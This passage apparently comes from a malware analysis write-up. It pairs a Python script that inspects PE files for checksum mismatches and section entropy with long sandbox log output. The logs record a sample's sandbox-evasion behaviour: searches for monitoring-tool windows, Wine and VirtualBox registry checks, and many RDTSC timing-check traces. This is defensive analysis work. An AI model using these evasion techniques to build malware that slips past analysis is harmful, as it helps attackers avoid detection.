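        "checksum_mismatch": stored != 0 and stored != computed,
        "sections": sections,
    }


def with_checksum(data: bytes, value: int) -> bytes:
    """Return a copy with the CheckSum field set to `value`."""
    off = struct.unpack_from("<I", data, 0x3C)[0] + 24 + 64
    return data[:off] + struct.pack("<I", value) + data[off + 4:]


def build_test_pe() -> bytes:
    """Constructed PE32: a zero-filled .text and a uniform-byte '.taggant'
    section that holds the entry point (assumed layout, CheckSum left 0)."""
    text, taggant = b"\0" * 0x200, bytes(range(256)) * 2
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)  # i386, 2 sections, EXECUTABLE|32BIT
    opt = struct.pack("<HBB9I6H4IHH6I", 0x10B, 14, 0, len(text), len(taggant), 0,
                      0x2010, 0x1000, 0x2000, 0x400000, 0x1000, 0x200,
                      6, 0, 0, 0, 6, 0, 0, 0x3000, 0x200, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    hdrs = b""
    for name, va, ptr, raw in ((b".text", 0x1000, 0x200, text), (b".taggant", 0x2000, 0x400, taggant)):
        hdrs += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), ptr, 0, 0, 0, 0, 0x60000020)
    return (dos + b"PE\0\0" + coff + opt + hdrs).ljust(0x200, b"\0") + text + taggant


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe()
    report = analyze_pe(image)
    for s in report.pop("sections"):
        print(f"{s['name']!r:12} va={s['va']:#x} entropy={s['entropy']:.2f}")
    for key, value in report.items():
        print(f"{key}: {value}")
```

Two details matter when reading the output against a report like this one. The checksum is only enforced by the loader for drivers, so a zero field is unremarkable; the finding above is that the field was set and is wrong, which is what a packer that rewrites sections without fixing the header leaves behind. And entropy is measured on the raw section bytes, so a section such as qmrtgfvc that is large, near 8.0 and executable-writable in the unpacked image is the candidate to dump once the unpacking stub has run.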

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00EC9860 GetProcAddress (x21), LoadLibraryA (x5), GetProcAddress (x7)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_1-13601)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 128E6CC second address: 128E6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5CB8E4DD9Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 128E6DC second address: 128E6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 128EAB7 second address: 128EABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 128EABB second address: 128EACB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5CB8E48996h 0x00000008 ja 00007F5CB8E48996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 128EACB second address: 128EAE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F5CB8E4DD96h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnl 00007F5CB8E4DD96h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 128EAE1 second address: 128EAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 128EAE5 second address: 128EAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1291372 second address: 129137C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129137C second address: 1291380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129152E second address: 1291538 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5CB8E4899Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1291538 second address: 12915AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 4766B94Bh 0x0000000d mov esi, dword ptr [ebp+122D3879h] 0x00000013 push 00000003h 0x00000015 mov esi, eax 0x00000017 mov esi, dword ptr [ebp+122D3A71h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F5CB8E4DD98h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 xor ecx, dword ptr [ebp+122D38B9h] 0x0000003f mov dword ptr [ebp+122D1B7Dh], esi 0x00000045 push 00000003h 0x00000047 movsx edx, si 0x0000004a call 00007F5CB8E4DD99h 0x0000004f pushad 0x00000050 pushad 0x00000051 jmp 00007F5CB8E4DDA6h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12915AE second address: 12915D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5CB8E489A7h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12915D0 second address: 12915EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5CB8E4DD96h 0x0000000a popad 0x0000000b pop esi 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 pushad 0x00000012 jno 00007F5CB8E4DD96h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12915EA second address: 1291602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jp 00007F5CB8E4899Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1291602 second address: 129161F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129161F second address: 1291623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1291623 second address: 1291629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291629 second address: 1291665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c call 00007F5CB8E489A5h 0x00000011 push edi 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 lea ebx, dword ptr [ebp+124532DEh] 0x0000001b mov dword ptr [ebp+122D1B33h], eax 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F5CB8E48998h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291729 second address: 129172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129172E second address: 1291796 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E48998h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 16A7E0FEh 0x00000013 push 00000003h 0x00000015 sub dword ptr [ebp+122D260Eh], edi 0x0000001b or ecx, dword ptr [ebp+122D3919h] 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F5CB8E48998h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D1B53h], eax 0x00000043 push 00000003h 0x00000045 mov edi, 6E44801Bh 0x0000004a call 00007F5CB8E48999h 0x0000004f push edx 0x00000050 jnc 00007F5CB8E48998h 0x00000056 pop edx 0x00000057 push eax 0x00000058 push esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop ecx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291796 second address: 12917D9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 jl 00007F5CB8E4DDA2h 0x0000001a jmp 00007F5CB8E4DD9Ch 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push ebx 0x00000023 pushad 0x00000024 jmp 00007F5CB8E4DD9Bh 0x00000029 push eax 0x0000002a pop eax 0x0000002b popad 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12917D9 second address: 12917DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A36D0 second address: 12A36D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B21BF second address: 12B21C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B21C7 second address: 12B21E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F5CB8E4DD96h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B21E9 second address: 12B21ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B04FB second address: 12B050C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5CB8E4DD96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B081F second address: 12B0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AB1 second address: 12B0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F5CB8E4DD96h 0x0000000e popad 0x0000000f jmp 00007F5CB8E4DDA0h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AD4 second address: 12B0AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AD8 second address: 12B0AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F5CB8E4DD9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AE8 second address: 12B0AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AF2 second address: 12B0AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AF7 second address: 12B0AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0AFD second address: 12B0B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0C6E second address: 12B0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5CB8E48996h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0C78 second address: 12B0C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0C7C second address: 12B0CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5CB8E489A9h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jc 00007F5CB8E48996h 0x00000017 jmp 00007F5CB8E489A1h 0x0000001c jl 00007F5CB8E48996h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0CC3 second address: 12B0CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0CCB second address: 12B0CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F5CB8E48996h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0CD7 second address: 12B0CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0E33 second address: 12B0E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5CB8E48996h 0x0000000a popad 0x0000000b jbe 00007F5CB8E489A2h 0x00000011 jg 00007F5CB8E48996h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B10E0 second address: 12B1107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F5CB8E4DD9Eh 0x0000000b jne 00007F5CB8E4DD9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F5CB8E4DD96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6CD9 second address: 12A6CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1287529 second address: 1287540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5CB8E4DD98h 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c push edx 0x0000000d jbe 00007F5CB8E4DD96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B13FC second address: 12B1402 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1402 second address: 12B140B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1985 second address: 12B1989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1989 second address: 12B1997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5CB8E4DD98h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1ADA second address: 12B1B03 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E48996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F5CB8E489AFh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1B03 second address: 12B1B31 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E4DDADh 0x00000008 pushad 0x00000009 jne 00007F5CB8E4DD96h 0x0000000f jnp 00007F5CB8E4DD96h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5051 second address: 12B5057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B5057 second address: 12B505B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BEA25 second address: 12BEA2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDE77 second address: 12BDE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDE7B second address: 12BDEE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a jmp 00007F5CB8E489A9h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F5CB8E489A9h 0x00000016 jmp 00007F5CB8E489A2h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5CB8E4899Eh 0x00000022 jne 00007F5CB8E48996h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE02E second address: 12BE049 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F5CB8E4DD96h 0x0000000d jg 00007F5CB8E4DD96h 0x00000013 jbe 00007F5CB8E4DD96h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE5C9 second address: 12BE5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE5CD second address: 12BE5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE5D1 second address: 12BE5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE780 second address: 12BE78A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE78A second address: 12BE798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F5CB8E48996h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0EC second address: 12BF0F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0F2 second address: 12BF0F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF0F8 second address: 12BF11B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF11B second address: 12BF12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF12E second address: 12BF134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF2A6 second address: 12BF2AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF2AC second address: 12BF2C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007F5CB8E4DD96h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 js 00007F5CB8E4DD96h 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF3FE second address: 12BF402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF402 second address: 12BF40C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF40C second address: 12BF420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5CB8E4899Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF999 second address: 12BF9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F5CB8E4DD96h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 ja 00007F5CB8E4DD96h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFA4A second address: 12BFA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFA4E second address: 12BFA73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5CB8E4DD9Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFEAB second address: 12BFEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 js 00007F5CB8E4899Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BFF29 second address: 12BFF2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C00D6 second address: 12C00DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C099D second address: 12C09A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C09A3 second address: 12C09A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
